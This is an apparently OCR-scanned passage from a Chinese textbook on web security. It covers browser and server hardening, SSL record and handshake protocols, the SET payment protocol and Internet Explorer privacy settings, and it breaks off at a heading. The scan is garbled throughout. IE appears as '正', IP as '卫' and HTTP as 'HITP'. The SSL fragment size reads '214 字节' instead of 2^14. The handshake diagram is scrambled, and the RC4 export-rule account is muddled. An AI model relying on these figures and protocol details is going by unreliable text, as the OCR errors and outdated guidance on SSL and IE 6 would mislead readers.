以 改变 信道 中 的 信息 流传 输 内 容 ， 造 成 对 信息 完整 性 的 安全 威胁 。 此 外 ， 还 有 像 利用 拒绝 
服务 的 攻击 ， 向 网 站 服务 器 发 送 大 量 请 求 造 成 主机 无 法 及 时 响应 而 瘫痪 ,或 者 发 送 大 量 的 
P 数据 包 来 阻塞 通信 信道 ， 使 网 络 的 速度 变 慢 。 


8.3.2 Web 安全 防护 技术 


1. Web 客户 端的 安全 防护 


Web 客户 端的 防护 措施 , 重点 对 Web 程序 组 件 的 安全 进行 防护 , 严格 限制 从 网 络 上 任 
意 下 载 程序 并 在 本 地 执行 。 可 以 在 浏览 器 进行 设置 ， 如 在 Microsoft Internet Explorer 的 
Internet 选项 的 高 级 窗口 中 将 Java 相关 选项 关闭 ;在 安全 窗口 中 选择 自 定义 级 别 ,将 ActiveX 
组 件 的 相关 选项 选 为 禁用 ; 在 隐私 窗口 中 根据 需要 选择 Cookie 的 级 别 ， 也 可 以 根据 需要 将 
ci\Windows\Cookie 下 的 所 有 Cookie 相关 文件 删除 。 

2. 通信 信道 的 安全 防护 

通信 信道 的 防护 措施 ， 可 在 安全 性 要 求 较 高 的 环境 中 ， 利 用 HTTPS 协议 替代 HTTP 
协议 。 利 用 安全 套 接 层 协议 SSL 保证 安全 传输 文件 ，SSL 通过 在 客户 端 浏 览 器 软件 和 Web 
服务 器 之 间 建 立 一 条 安全 通信 信道 , 实现 信息 在 Internet 中 传送 的 保密 性 和 完整 性 。 但 SSL 
会 造成 Web 服务 器 性 能 上 的 一 些 下 降 。 

3. Web 服务 器 端的 安全 防护 

下 面 是 对 Web 服务 器 进行 保护 时 ， 需 要 注意 的 情况 。 

e ”限制 在 Web 服务 器 中 帐户 数量 ， 对 于 在 Web 服务 器 上 建立 的 帐户 ， 在 口令 长 度 
及 定期 更 改 方面 作出 要 求 ， 防 止 被 盗用 。 
Web 服务 器 本 身 会 存在 一 些 安全 上 的 漏洞 ， 需 要 及 时 进行 版 本 升级 更 新 。 
尽量 使 E-mail、 数 据 库 等 服务 器 与 Web 服务 器 分 开 ， 去 掉 无 关 的 网 络 服务 。 
在 Web 服务 器 上 去 掉 一 些 不 用 的 如 Shell 之 类 的 解释 器 。 
定期 查看 服务 器 中 的 日 志文 件 ， 分 析 一 切 可 疑 事件 。 
设置 好 Web 服务 器 上 系统 文件 的 权限 和 属性 。 
通过 限制 许可 访问 用 户 卫 或 DNS。 
从 CGI 编程 角度 考虑 安全 。 采 用 比 解释 语言 会 更 安全 些 的 编译 语言 ， 并 且 CGI 
程序 (去 空格 ) 放 在 独立 于 HTML 存放 目录 之 外 的 CGI-BIN 下 等 措施 。 
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8.3.3 安全 套 接 层 协议 
1. SSL 概述 


SSL 的 英文 全 称 是 Secure Sockets Layer， 中 文 名 为 “安全 套 接 层 协议 ”， 它 最 先是 由 
著名 的 Netscape 公司 开发 的 基于 Web 应 用 的 安全 协议 。 现 在 被 广泛 用 于 Internet 上 的 身份 
认证 与 Web 服务 器 和 用 户 端 浏 览 器 之 间 的 数据 安全 通信 。 

SSL 协议 指定 了 一 种 在 应 用 程序 协议 (如 HITP、TELENET 和 FTP 等 ) 和 TCP/IP 协议 
之 间 提 供 数据 安全 性 分 层 的 机 制 ， 并 为 TCP/IP 连接 提供 数据 加 密 、 服 务 器 认证 、 消 息 完整 
性 以 及 可 选 的 客户 机 认证 。 

制定 SSL 协议 的 宗旨 是 为 通信 双方 提供 安全 可 靠 的 通信 协议 服务 ， 在 通信 双方 间 建 立 

-个 传输 层 安全 通道 。SSL 使 用 对 称 加 密 来 保证 通信 保密 性 ， 使 用 消息 认证 码 (MAC) 来 保 
证 数据 完整 性 。SSL 主要 使 用 PKI 在 建立 连接 时 对 通信 双方 进行 身份 认证 。 

SSL 提供 三 种 基本 的 安全 服务 ， 它 们 都 使 用 公开 密 钥 技术 。 

(1) 信息 私密 : 通过 使 用 公开 密 钥 和 对 称 密 钥 技术 以 达到 信息 私密 。SSL 客户 机 和 SSL 
服务 器 之 间 的 所 有 业务 使 用 在 SSL 握手 过 程 中 建立 的 密 钥 算法 进行 加 密 。 这 样 就 防止 了 某 
些 用 户 通过 使 用 IP Packet Sniffer 工具 非法 窃听 。 尽 管 Packet Sniffer 仍 能 捕捉 到 通信 的 内 容 ， 
却 无 法 破译 。 

(2) 信息 完整 性 : 确保 SSL 业务 全 部 达到 目的 。 如 果 Internet 成 为 可 行 的 电子 商业 平 
台 , 应 确保 服务 器 和 客户 机 之 间 的 信息 内 容 免 受 破坏 。SSL 利用 机 密 共 享 和 Hash 函数 组 提 
供 信息 完整 性 服务 。 

(3) 相互 认证 : 是 客户 机 和 服务 器 相互 识别 的 过 程 。 它 们 的 识别 号 用 公开 密 钥 编码 ， 
并 在 SSL 握手 时 交换 各 自 的 识别 号 。 

SSL 协议 的 目标 ， 按 它们 的 优先 级 分 为 如 下 。 

(1) 在 通信 双方 之 间 利 用 加 密 的 SSL 消息 建立 安全 的 连接 。 

(2) 互 操作 性 。 通 信 双 方 的 程序 是 独立 的 ， 但 双方 可 以 在 不 知道 对 方程 序 编码 的 情况 
下 ， 利 用 SSL 成 功 地 交换 加 密 参 数 。 

(3) 可 扩展 性 。SSL 寻求 提供 一 种 框架 结构 ， 在 此 框架 结构 中 ， 在 不 对 协议 进行 大 的 
修改 的 情况 下 ， 可 以 在 必要 时 加 入 新 的 公 钥 算法 和 单 钥 算法 。 这 样 做 还 可 以 实现 两 个 子 
目标 : 

。 ”避免 产生 新 协议 ， 因 而 进一步 避免 了 产生 新 的 不 足 的 可 能 性 ; 

。 ”避免 了 实现 一 完整 的 安全 协议 的 需要 。 

2. SSL 体系 结构 


SSL 是 位 于 TCP/IP 和 各 种 应 用 层 协 议 之 间 的 一 种 数据 安全 协议 , 如 图 8-21 所 示 。SSL 
协议 可 以 有 效 地 避免 网 上 信息 的 窃听 、 算 改 及 信息 的 伪造 。 

SSL 协议 由 两 层 组 成 ， 分 别 是 握手 协议 层 和 记录 协议 层 。 握 手 协议 建立 在 记录 协议 之 
上 。 此 外 ， 还 有 警告 协议 、 密 码 更 新 协议 和 应 用 数据 协议 等 对 话 协议 和 管理 提供 支持 的 子 
协议 。SSL 协议 的 组 成 如 图 8-22 所 示 。 
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图 8-21 SSL 体系 结构 
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SSL 发 出 消息 是 将 数据 分 为 可 管理 的 块 、 压 缩 、 使 用 MAC 加 密 并 发 出 加 密 的 结果 。 
接收 消息 需要 解密 、 验 证 、 解 压 和 重组 ， 再 把 结果 发 往 更 高 一 层 的 客户 。 
1) “记录 协议 
具体 实现 压缩 /解压 缩 、 加 密 / 解 密 、 计 算 机 MAC 等 与 安全 有 关 的 操作 。 建 立 之 上 的 还 
有 密码 更 新 协议 、 报 警 协议 和 应 用 数据 协议 。 

。 ”密码 更 新 协议 :此 协议 由 一 条 消息 组 成 ， 可 由 客户 端 或 服务 器 发 送 ， 通 知 接收 方 
后 面 的 记录 将 被 新 协商 的 密码 说 明和 密 钥 保护 ， 接 收 方 获得 此 消息 后 ， 立 即 指示 
记录 层 把 即将 读 状 态 变 成 当前 读 状 态 ， 发 送 方 发 送 此 消息 后 ， 应 立即 指示 记录 层 
把 即将 写 状态 变 成 当前 写 状 态 。 

。 ”报警 协议 ， 警告 消息 传达 消息 的 严重 性 并 描述 警告 。 一 个 致命 的 警告 将 立即 终止 
连接 。 与 其 他 消息 一 样 ， 警 告 消息 在 当前 状态 下 被 加 密 和 压缩 。 警 告 消息 有 : 关 
闭 通知 消息 、 意 外 消息 、 错 误 记 录 MAC 消息 、 解 压 失败 消息 、 握 手 失败 消息 、 
无 证 书 消息 、 错 误 证 书 消息 、 不 支持 的 证 书 消息 、 证 书 撤回 消息 、 证 书 过 期 消息 、 
证 书 未 知 和 参数 非法 消息 等 。 

e。 应 用 数据 协议 : 将 应 用 数据 直接 传递 给 记录 协议 。 

2) ”握手 协议 

SSL 握手 协议 是 用 来 在 客户 端 和 服务 器 端 传 输 应 用 数据 而 建立 的 安全 通信 机 制 。 

。 ”算法 协商 ， 首次 通信 时 ， 双 方 通过 握手 协议 协商 密 钥 加 密 算法 、 数 据 加 密 算法 和 
文摘 算法 。 

。 ”身份 验证 : 在 密 钥 协商 完成 后 , 客户 端 与 服务 器 端 通过 证 书 互相 验证 对 方 的 身份 。 
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。 确定 密 钥 : 最 后 使 用 协商 好 的 密 钥 交 换算 法 产生 一 个 只 有 双方 知道 的 秘密 信息 ， 
客户 端 和 服务 器 端 各 自 根 据 这 个 秘密 信息 确定 数据 加 密 算法 的 参数 (一 般 是 密 
钥 )。 由 此 可 见 ，SSL 协议 是 端 对 端的 通信 安全 协议 。 

3. SSL 协议 

1) ”记录 协议 

SSL 记录 协议 为 SSL 连接 提供 两 种 服务 : 机 密 性 和 报 文 完整 性 。 

在 SSL 协议 中 ， 所 有 的 传输 数据 都 被 封装 在 记录 中 。 记 录 是 由 记录 头 和 长 度 不 为 0 的 

记录 数据 组 成 的 。 所 有 的 SSL 通信 都 使 用 SSL 记录 层 ， 记 录 协 议 封装 上 层 的 握手 协议 、 警 

告 协议 、 改 变 密码 格式 协议 和 应 用 数据 协议 。SSL 记录 协议 包括 了 记录 头 和 记录 数据 格式 

的 规定 。 

SSL 记录 协议 定义 了 要 传输 数据 的 格式 ， 它 位 于 一 些 可 靠 的 传输 协议 之 上 (如 TCP)， 

用 于 各 种 更 高 层 协议 的 封装 。 记 录 协 议 主 要 完成 分 组 和 组 合 ， 压 缩 和 解压 缩 ， 以 及 消息 认 

证 和 加 密 等 功能 。 完 整 的 记录 协议 的 操作 过 程 如 图 8-23 所 示 。 
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具体 步骤 如 下 。 

(1) 分 段 。 每 个 上 层 应 用 数据 被 分 成 214 字 节 或 更 小 的 数据 块 。 记 录 中 包含 类 型 、 版 
本 号 、 长 度 和 数据 字段 。 

(2) 压缩 。 压 缩 是 可 选 的 ， 并 且 是 无 损 压 缩 ， 压 缩 后 内 容 长 度 的 增加 不 能 超过 1024 

(3) 在 压缩 数据 上 增加 消息 认证 MAC。 

(4) 对 压缩 数据 及 MAC 进行 加 密 。 

(5) 增加 SSL 记录 头 。 

记录 协议 字段 包括 : 

内 容 类 型 (8 位 ): 封装 的 高 层 协议 。 
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主要 版 本 (8 位 ): 使 用 的 SSL 主要 版 本 。 对 于 SSLv3.0， 值 为 3。 

次 要 版 本 (8 位 ): 使 用 的 SSL 次 要 版 本 。 对 于 SSLv3.0， 值 为 0。 

压缩 长 度 (16 位 ): 明文 数据 (如 果 选 用 压缩 则 是 压缩 数据 ) 以 字 节 为 单位 的 长 度 。 
SSL 记录 格式 如 图 8-24 所 示 。 


内 容 类 型 主要 版 本 次 要 版 本 压缩 长 度 
明文 (压缩 可 选 ) 


MAC(0.16 或 20 位 ) 


图 8-24 SSL 记录 的 格式 
已 经 定义 的 内 容 类 型 是 握手 协议 、 警 告 协 议 、 改 变 密码 格式 协议 和 应 用 数据 协议 。 基 
中 改变 密码 格式 协议 是 最 简单 的 协议 ， 这 个 协议 由 值 为 1 的 单字 节 报 文 组 成 ， 用 于 改变 连 
接 使 用 的 密 文 禾 。 和 警告 协议 用 来 将 SSL 有 关 的 警告 传送 给 对 方 。 警 告 协议 的 每 个 报 文 由 两 
个 字 节 组 成 ， 第 一 字 节 指明 级 别 (1 警告 或 2 致命 )， 第 二 字 节 指明 特定 警告 的 代码 。 
2) ”握手 协议 
SSL 握手 协议 被 封装 在 记录 协议 中 ， 该 协议 允许 服务 器 与 客户 机 在 应 用 程序 传输 和 接 
收 数据 之 前 互相 认证 、 协 商 加 密 算法 和 密 钥 。 在 初次 建立 SSL 连接 时 服务 器 与 客户 机 交换 
-系列 消息 。 这 些 交 换 消息 能 够 实现 以 下 操作 。 
(1) 客户 机 认证 服务 器 ; 
(2) 允许 客户 机 与 服务 器 选择 双方 都 支持 的 密码 算法 ; 
(3) 可 选择 的 服务 器 认证 客户 ; 
(4) 使 用 公 钥 加 密 技术 生成 共享 密 钥 ; 
(5) 建立 加 密 SSL 连接 。 
SSL 握手 协议 报 文 头 包括 三 个 字段 。 
。 ”类 型 (1 字 节 ): 该 字段 指明 使 用 的 SSL 握手 协议 报 文 类 型 。SSL 握手 协议 报 文 包 
括 10 种 类 型 。 报 文 类 型 如 表 8-2 所 示 。 


高 。 ”长 度 (3 字 节 ): 以 字 节 为 单位 的 报 文 长 度 。 

加 。 ”内容 (>1 字 节 )。 使 用 的 报 文 的 有 关 参 数 。 

表 8-2 SSL 握手 协议 报 文 的 类 型 

区 报 文 类 型 参 数 

材 hello_request 空 

证 client_hello 版 本 、 随 机 数 、 会 话 ID、 密 文 族 、 压 缩 方法 
算 server hello 版 本 、 随 机 数 、 会 话 ID、 密 文 族 、 压 缩 方 法 
归 certificate X.509v3 证 书 链 

列 Server key exchange 参数 、 签 名 


类 型 、 授 权 


Certificate request 
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续 表 
报 文 类 型 参 数 
server done 空 
certificate_verify 签名 
client key exchange 参数 、 签 名 
finished Hash 值 
SSL 握手 协议 的 过 程 如 图 8-25 所 示 。 
客户 服务 器 
client hello 
建立 协议 版 本 、 会 话 ID、 密 文 艇 、 
0 ee 压缩 方法 、 交 换 随机 数 
,eee 本 入 全 证 首届 
certificate* 


@ server_key_exchange* 
人 可 选 的 发 送 服务 器 证 书 、 请 求 
certificate_request* 客户 证 书 

server_hello_done 


certificate* 


lient_ks han 
© re, 如 果 请 求 的 话 ， 客 户 发 送 证 书 


client_verity* 


change_ cipher spec 
OOOO 
(4) finished 


change_cipher_spec 修改 密 文通 并 结束 握手 协议 
一 
finished 


注 : 带 * 的 传输 是 可 选 的 ， 或 者 与 站 点 相关 的 ， 并 不 总 是 发 送 的 报 文 。 
图 8-25 SSL 握手 协议 的 过 程 


以 上 所 描述 的 在 客户 机 与 服务 器 之 间 建 立轴 辑 连接 所 需 的 初始 交换 过 程 ， 可 以 分 为 四 
个 阶段 。 

(1) 建立 安全 能 力 。 客 户 机 向 服务 器 发 送 client_ hello 报 文 ， 服 务 器 向 客户 机 回应 
server_hello 报 文 ， 建 立 如 下 的 安全 属性 : 协议 版 本 、 会 话 ID、 密 文秘 、 压 缩 方 法 ， 同 时 生 
成 并 交换 用 于 防止 重 放 攻击 的 随机 数 。 密 文秘 参数 包括 密 钥 交换 方法 (Deffie-Hellman 密 钥 
交换 算法 、 基 于 RSA 的 密 钥 交换 和 另 一 种 实现 在 Fortezza Chip 上 的 密 钥 交换 )、 加 密 算 法 
(DES、RC4、RC2、3DES 等 )、MAC 算法 (MD5 或 SHA-1)、 加 密 类 型 ( 流 或 分 组 ) 等 内 容 。 
(2) 服务 器 认证 和 密 钥 交换 。 在 hello 报 文 之 后 ， 如 果 服 务 器 需要 被 认证 ， 服 务 器 将 发 
送 其 证 书 。 如 果 需 要 ， 服 务 器 还 要 发 送 server_key_exchange。 然 后 ， 服 务 器 可 以 向 客户 发 
送 certificate_request 请 求证 书 。 服 务 器 总 是 发 送 server_hello_done 报 文 , 指示 服务 器 的 hello 
阶段 结束 。 
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(3) 客户 认证 和 密 钥 交 换 。 客 户 一 旦 收 到 服务 器 的 server_ hello done 报 文 ， 客 户 将 检 
查 服务 器 证 书 的 合法 性 (如 果 服 务 器 要 求 )。 如 果 服 务 器 向 客户 请 求 了 证 书 ， 客 户 必须 发 送 
客户 证 书 , 然 后 发 送 client key_exchange 报 文 , 报 文 的 内 容 依赖 于 client_ hello 与 server_ hello 
定义 的 密 钥 交 换 的 类 型 。 最 后 ， 客 户 可 能 发 送 client verify 报 文 来 校 验 客户 发 送 的 证 书 ， 
这 个 报 文 只 能 在 具有 签名 作用 的 客户 证 书 之 后 发 送 。 
(4) 结束 。 客 户 发 送 change_cipher_ spec 报 文 并 将 挂 起 的 CipherSpec 复制 到 当前 的 
CipherSpec。 这 个 报 文 使 用 的 是 改变 密码 格式 协议 。 然 后 ， 客 户 在 新 的 算法 、 对 称 密 钥 和 
MAC( 信 息 认 证 码 ) 之 下 立即 发 送 finished 报 文 。finished 报 文 验证 密 钥 交 换 和 鉴别 过 程 是 成 
功 的 。 服 务 器 对 这 两 个 报 文 响 应 ， 发 送 自己 的 change_cipher_spec 报 文 、finished 报 文 。 握 
手 结束 ， 客 户 与 服务 器 可 以 发 送 应 用 层 数据 了 。 
当 客户 从 服务 器 端 传送 的 证 书 中 获得 相关 信息 时 ， 需 要 检查 以 下 内 容 来 完成 对 服务 器 
的 认证 : 时 间 是 否 在 证 书 的 合法 期 限 内 ; 签发 证 书 的 机 关 是 否 是 客户 端 信任 的 ;签发 证 书 
的 公 钥 是 否 符合 签发 者 的 数字 签名 ; 证 书 中 的 服务 器 域名 是 否 符合 服务 器 自己 真正 的 域名 。 
服务 器 被 验证 成 功 后 ， 客 户 继续 进行 握手 过 程 。 
同样 的 ， 服 务 器 从 客户 传送 的 证 书 中 获得 相关 信息 后 认证 客户 的 身份 ， 需 要 检查 : 用 
户 的 公 钥 是 否 符合 用 户 的 数字 签名 ;时 间 是 否 在 证 书 的 合法 期 限 内 ， 签 发 证 书 的 机 关 是 否 
是 服务 器 信任 的 ;， 用户 的 证 书 是 否 被 列 在 服务 器 的 LDAP 里 用 户 的 信息 中 ;得 到 验证 的 用 
户 是 否 仍然 有 权限 访问 请 求 的 服务 器 资源 。 
4. SSL 协议 存在 的 问题 
1)” 密 钥 管 理 问题 
设计 一 个 安全 有 效 的 密 钥 交换 协议 是 很 复杂 的 ， 因 此 ，SSL 的 握手 协议 也 存在 一 些 密 
钥 管 理 问题 。SSL 的 问题 表现 在 : 
e ”客户 机 和 服务 器 在 互相 发 送 自 己 能 够 支持 的 加 密 算法 时 ， 是 以 明文 发 送 的 ， 存 在 
被 攻击 修改 的 可 能 。 

。 ”SSL V3.0 为 了 兼容 以 前 的 版 本 ， 可 能 降低 安全 性 。 

。 所 有 的 会 话 密 钥 中 都 将 生成 MASTER-KEY， 握 手 协议 的 安全 完全 依赖 于 对 
MASTER-KEY 的 保护 ， 因 此 在 通信 中 要 尽 可 能 地 少 使 用 MASTER-KEY。 

2) ”加 密 强 度 问 题 

Netscape 依照 美国 内 政 部 的 规定 ,在 它 的 国际 版 的 浏览 器 及 服务 器 上 使 用 40 位 的 密 钥 。 

以 SSL 所 使 用 的 RC4 演绎 法 所 命名 的 RC4 法 规 , 对 多 于 40 位 长 的 加 密 密 钥 产品 的 出 
口 加 以 限制 ， 这 项 规定 使 Netscape 的 128 位 加 密 密 钥 在 美国 之 外 的 地 方 变 成 不 合法 。 一 个 
著名 的 例子 是 一 个 法 国 的 研究 生 和 两 个 美国 柏 克 莱 大 学 的 研究 生 破译 了 一 个 SSL 的 密 钥 ， 
才 使 人 们 开始 怀疑 以 SSL 为 基础 的 系统 安全 性 。 

Microsoft 公司 想 利用 一 种 称 为 私人 通信 技术 (Private Communication Technology，PCT) 
的 SSLsuperset 协议 来 改进 SSL 的 缺点 。PCT 会 衍生 出 第 二 个 专门 为 身份 验证 用 的 密 钥 ， 
这 个 身份 验证 并 不 属于 RC4 规定 的 管辖 范围 。 PCT 加 入 比 目 前 随机 数 产生 器 更 安全 的 产生 
器 ， 因 为 它 也 是 SSL 安全 链 中 的 一 个 弱 环 节 。 这 个 随机 数 产生 器 提供 了 产生 加 密 密 钥 的 种 
子 数目 (Seed Number)。 
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3) ”数字 签名 问题 

SSL 协议 没有 数字 签名 功能 ， 即 没有 抗 否 认 服 务 。 若 要 增加 数字 签名 功能 ， 则 需要 在 
协议 中 打 “ 补 丁 ”。 这 样 做 ， 在 用 于 加 密 密 钥 的 同时 又 用 于 数字 签名 ， 这 在 安全 上 存在 漏 
洞 。 后 来 PKI 体系 完善 了 这 种 措施 ， 即 双 密 钥 机 制 , 将 加 密 密 钥 和 数字 签名 密 钥 二 者 分 开 ， 
成 为 双 证 书 机 制 。 这 是 PKI 完整 的 安全 服务 体系 。 


8.3.4 安全 电子 交易 协议 
1. SET 概述 


安全 电子 交易 (Secure Electronic Transaction，SET) 是 美国 Visa 和 MasterCard 两 大 信用 
上 组 织 于 1997 年 5 月 31 日 联合 推出 的 用 于 电子 商务 的 行业 规范 ， 其 实质 是 一 种 应 用 在 
Internet 上 、 以 信用 卡 为 基础 的 电子 付款 系统 规范 ， 目 的 是 为 了 保证 网 络 交易 的 安全 。SET 
妥善 地 解决 了 信用 卡 在 电子 商务 交易 中 的 交易 协议 、 信 息 保 密 、 资 料 完整 以 及 身份 认证 等 
问题 。SET 已 获得 IETF 标准 的 认可 ， 是 电子 商务 的 发 展 方向 。 

具体 来 说 ，SET 用 来 满足 如 下 的 商业 需要 。 

。 ”对 订单 信息 和 付款 信息 提供 机 密 性 。 

e ”保证 传输 资料 的 完整 性 。 

。 持 卡 人 的 认证 ， 保 证 持 卡 人 是 支付 帐户 的 合法 用 户 。 

。 商家 认证 ， 保 证 商家 得 到 金融 机 构 的 认可 ， 可 以 通过 与 金融 机 构 的 关系 接受 信用 

长 交易 。 
2. SET 支付 系统 的 组 成 


SET 支付 系统 主要 由 持 卡 人 (CardHolder)、 商 家 (Merchant)、 发 卡 行 (Issuing Bank)、 收 
单行 (Acquiring Bank)、 支 付 网 关 (Payment Gateway)、 认 证 中 心 (Certificate Authority) 六 个 部 
分 组 成 。 对 应 地 ， 基 于 SET 协议 的 网 上 购物 系统 至 少 包括 电子 钱包 软件 、 商 家 软件 、 支 付 
网 关 软 件 和 签发 证 书 软件 。 

(1) 持 卡 人 : 指 由 发 卡 银行 所 发 行 的 支付 卡 的 授权 持 有 者 。 

(2) 商家 : 指出 售 商品 或 服务 的 个 人 或 机 构 。 商 家 必须 与 收 单 银行 建立 业务 联系 ， 以 
接受 支付 卡 这 种 付款 方式 。 

(3) 发 卡 银行 ， 指 向 持 卡 人 提供 支付 卡 的 金融 机 构 。 

(4) 收音 银行 ， 指 与 商家 建立 业务 联系 的 金融 机 构 。 

(5) 支付 网 关 : 实现 对 支付 信息 从 Internet 到 银行 内 部 网 络 的 转换 , 并 对 商家 和 持 卡 人 
进行 认证 。 

(6) 认证 中 心 (CA): 在 基于 SET 协议 的 电子 商务 体系 中 起 着 重要 作用 。 可 以 为 持 卡 人 、 
商家 和 支付 网 关 签 发 X.509V3 数字 证 书 ， 让 持 卡 人 、 商 家 和 支付 网 关 通过 数字 证 书 进行 认 
证 。CA 同时 要 对 证 书 进行 管理 。 
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3. SET 协议 的 工作 流程 


(1) 消费 者 利用 自己 的 PC 机 通过 因特网 选 定 所 要 购买 的 物品 ， 并 在 计算 机 上 输入 订 
货 单 ， 订 货 单 上 需 包 括 在 线 商店 、 购 买 物品 名 称 及 数量 、 交 货 时 间 及 地 点 等 相关 信息 。 

(2) 通过 电子 商务 服务 器 与 有 关 在 线 商 店 联系 ， 在 线 商 店 作 出 应 答 ， 告 诉 消费 者 所 填 
订货 单 的 货物 单价 、 应 付款 数 、 交 货 方式 等 信息 是 否 准 确 ， 是 否 有 变化 。 

(3) 消费 者 选择 付款 方式 ， 确 认 订 单 ， 签 发 付款 指令 。 此 时 SET 开始 介入 。 

(4) 在 SET 中 ， 消 费 者 必须 对 订单 和 付款 指令 进行 数字 签名 ， 同 时 利用 双重 签名 技术 
保证 商家 看 不 到 消费 者 的 帐号 信息 。 

(5) 在 线 商店 接受 订单 后 ， 向 消费 者 所 在 银行 请 求 支付 认可 。 信 息 通过 支付 网 关 到 收 
单 银 行 ， 再 到 电子 货币 发 行 公司 确认 。 批 准 交易 后 ， 返 回 确认 信息 给 在 线 商店 。 

(6) 在 线 商 店 发 送 订单 确认 信息 给 消费 者 。 消 费 者 端 软件 可 记录 交易 日 志 ， 以 备 将 来 
查询 。 

(7) 在 线 商店 发 送 货物 或 提供 服务 并 通知 收 单 银 行将 钱 从 消费 者 的 帐号 转移 到 商店 帐 
号 , 或 通知 发 卡 银行 请 求 支付 。 在 认证 操作 和 支付 操作 中 间 一 般 会 有 一 个 时 间 间 隔 ， 例 如， 
在 每 天 的 下 班 前 请 求 银行 结 一 天 的 帐 。 

前 两 步 与 SET 无 关 ， 从 第 三 步 开始 SET 起 作用 , 一 直到 第 六 步 ,在 处 理 过 程 中 通信 协 
议 、 请 求 信息 的 格式 、 数据 类 型 的 定义 等 SET 都 有 明确 的 规定 。 在 操作 的 每 一 步 ， 消 费 者 、 
在 线 商 店 、 支 付 网 关 都 通过 CA( 认 证 中 心 ) 来 验证 通信 主体 的 身份 ， 以 确保 通信 的 对 方 不 是 
冒名 顶替 。 所 以 ， 也 可 以 简单 地 认为 SET 充分 发 挥 了 认证 中 心 的 作用 ， 以 维护 在 任何 开放 
网 络 上 的 电子 商务 参与 者 所 提供 信息 的 真实 性 和 保密 性 。 

4. SET 协议 的 特点 


(1) 信息 的 保密 性 。SET 的 一 个 重要 特点 是 持 卡 人 的 信用 卡号 码 只 提供 给 银行 ， 而 商 
家 无 法 知道 信用 卡号 码 。SET 利用 DES 密码 算法 提供 信息 的 保密 性 。 

(2) 数据 完整 性 。 从 持 卡 人 发 往 商 家 的 支付 信息 包括 订购 信息 、 个 人 数据 及 支付 指令 。 
SET 引入 RSA 数字 签名 及 SHA-1 杂凑 函数 确保 这 些 消息 的 内 容 在 传输 过 程 中 不 被 非法 
更 改 。 

(3) 持 卡 人 身份 的 鉴别 。SET 可 以 让 商家 鉴别 持 卡 人 是 有 效 信 用 卡 帐 号 的 合法 用 户 。 
SET 采用 X.509V3 数字 证 书 和 RSA 数字 签名 达到 这 一 目的 。 

(4) 商家 的 鉴别 。SET 使 持 卡 人 可 以 鉴别 商家 真实 性 ， 而 且 可 以 验证 商家 能 否 接受 信 
用 卡 支 付 。SET 同样 采用 X.509V3 数字 证 书 和 RSA 数字 签名 实现 这 一 功能 。 


8.3.5 主页 防 修改 技术 
针对 浏览 器 主页 的 恶意 修改 ， 下 面 以 正 浏览 器 为 例 介绍 几 种 常用 的 防 修改 技巧 。 
1. 管理 好 Cookie 


在 正 6.0 中 ， 选择 “工具 ”|“Intemet 选项 ”|“ 隐 私 ” 命 令 ， 打 开 对 话 框 ， 在 此 对 话 
框 中 设 定 了 “阻止 所 有 Cookie”、“ 高 ”、“ 中 高 ”、“ 中 ”、“ 低 ”、“ 接 受 所 有 Cookie” 
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六 个 级 别 (默认 为 “中 ”)， 只 要 拖 动 滑 块 就 可 以 方便 地 进行 设 定 ， 而 单 击 下 方 的 “编辑 ” 
按钮 ， 在 “网 站 地 址 ”中 输入 特定 的 网 址 ， 就 可 以 将 其 设 定 为 允许 或 拒绝 它们 使 用 Cookie。 
2. 禁用 或 限制 使 用 Java 程序 及 ActiveX 控件 


在 网 页 中 经 常 使 用 Java、Java Applet、ActiveX 编写 的 脚本 ， 它 们 可 能 会 获取 你 的 用 户 
标识 、 卫 地 址 ， 乃 至 口令 ， 甚 至 会 在 你 的 计算 机 上 安装 某 些 程序 或 进行 其 他 操作 ， 因 此 应 
对 Java、Java 小 程序 脚本 、ActiveX 控件 和 插件 的 使 用 进行 限制 。 选 择 “Internet 选项 ”| 
“安全 ”|“ 自 定义 级 别 ”， 就 可 以 设置 “ActiveX 控件 和 插件 ”、“Java”、“ 脚 本 ”、“ 下 
载 ”、“ 用 户 验证 ”以 及 其 他 安全 选项 。 对 于 一 些 不 太 安 全 的 控件 或 插件 以 及 下 载 操 作 ， 
应 该 予以 禁止 、 限 制 ， 至 少 要 进行 提示 。 

3. 防止 泄露 自己 的 信息 

默认 条 件 下 ， 用 户 在 第 一 次 使 用 Web 地址、 表单、 表单 的 用 户 名 和 密码 后 ， 同 意 保存 
密码 ， 在 下 一 次 再 进入 同样 的 Web 页 及 输入 密码 时 ， 只 需 输入 开头 部 分 ， 后面 的 就 会 自动 
完成 ， 给 用 户 带 来 了 方便 ,但 同时 也 留 下 了 安全 隐患 ， 不 过 我 们 可 以 通过 调整 “自动 完成 ” 
功能 的 设置 来 解决 。 设置 方法 如 下 : 依次 选择 “Internet 选项 ”一 “内 容 ” 一 “自动 完成 ”， 
打开 “自动 完成 设置 ”对 话 框 ， 选 中 “自动 完成 ” 复 选 框 。 


注意 : 为 安全 起 见 ， 防 止 泄露 自己 的 一 些 信 息 ， 应 该 定期 清除 历史 记录 ， 方 法 是 在 “自动 
完成 设置 ”对 话 框 中 单 击 “清除 表单 ”和 “清除 密码 ”按钮 。 

4. 清除 已 浏览 过 的 网 址 

在 “Internet 选项 ”对 话 框 的 “常规 ”选项 卡 中 单 击 “ 历 史记 录 ” 选 项 组 中 的 “清除 历 
史记 录 ” 按 钮 即 可 。 若 只 想 清除 部 分 记录 ， 单 击 正 工具 栏 上 的 “历史 ”按钮 ， 在 左 栏 的 地 
址 历史 记录 中 ， 找 到 希望 清除 的 地 址 或 其 下 网 页 ， 右 击 并 从 弹出 的 快捷 菜单 中 选择 “删除 ” 
命令 。 

5. 清除 已 访问 过 的 网 页 

为 了 加 快 浏览 速度 ， 正 会 自动 把 你 浏览 过 的 网 页 保存 在 缓存 文件 夹 “C:/Windows/ 
Temporary Internet Files” 下 。 当 你 确认 不 再 需要 浏览 过 的 网 页 时 ， 在 此 选中 所 有 网 页 ， 删 
除 即 可 。 或 者 在 “Intemet 选项 ”的 “常规 ”选项 卡 中 单 击 “Internet 临时 文件 ”选项 组 中 
的 “删除 文件 ”按钮 ， 在 打开 的 “删除 文件 ”对 话 框 中 选择 “删除 所 有 脱 机 内 容 ”， 单 击 
“确定 ”按钮 。 这 种 方法 会 遗留 少许 Cookie 在 文件 夹 内 ， 为 此 正 6.0 在 “删除 文件 ”按钮 
旁边 增加 了 一 个 “删除 Cookie” 的 按钮 ， 通 过 它 可 以 很 方便 地 删除 遗留 的 Cookie。 

6. 解除 IE 的 分 级 审查 口令 

